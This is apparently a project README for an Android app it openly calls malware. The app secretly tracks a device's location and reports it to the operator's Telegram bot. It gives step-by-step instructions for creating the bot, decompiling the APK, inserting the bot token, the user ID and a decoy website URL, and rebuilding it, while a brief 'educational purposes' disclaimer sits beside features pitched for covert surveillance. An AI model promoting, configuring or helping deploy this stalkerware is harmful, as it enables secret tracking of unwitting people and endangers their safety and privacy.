
LocationEye is a powerful Android malware designed to track a device's location


Powerful Android malware designed to track device's location

This software is exclusively designed for educational purposes ⚠️


  • Real-time Location Tracking: LocationEye allows you to monitor a device's location in real-time, keeping you informed about its whereabouts.
  • Easy setup: Simplified and user-friendly setup, making it a breeze to start using LocationEye
  • Anonymous and secure: LocationEye tracks location in the background without any interruptions
  • Telegram based: LocationEye sends all collected data to your own Telegram bot, eliminating the need for port forwarding or complex server setups. You can trust your data is easily accessible and secure

Setup and installation

Step 1

To set up LocationEye, you'll require two APK files:

Step 2

Obtain your Telegram bot token and your numeric Telegram id.

Create a Telegram bot:

Open BotFather on your telegram acccount: Open BotFather

Start BotFather and send /newbot commend and then BotFather will ask you to enter a name and a username for your bot.

After that BotFather will create your bot, copy and save your bot token and click on your bot username and start it.

Obtain your numeric id:

To obtain your teleram account numeric id you need to start @userinfobot Teleram bot

Click here to start userinfobot Telegram bot

After starting this bot, the bot will send you your numeric telegram id

Step 3

Install Apk editor and open it then selcet Apk file and select LocationEye Apk file that you installed on step 1

After finding and selecting LocationEye apk file select full edit and then Decode all files

After opening LocationEye apk in apk editor go to files tab

In the files tab navigate to assets folder

In the assets folder you will see 3 files

  • id.txt: Open it, eneter your numeric Telegram id(which you obtained in step 2) and save it
  • token.txt: Open it, eneter your Telegram bot token(which you obtained in step 1) and save it
  • url.txt: Open it, eneter the url of the website that you want to show up after opening the app


Step 4

After doing all above steps click on Smali button at the top right of screen

After clicking on Smali button, click on Build button and build the app


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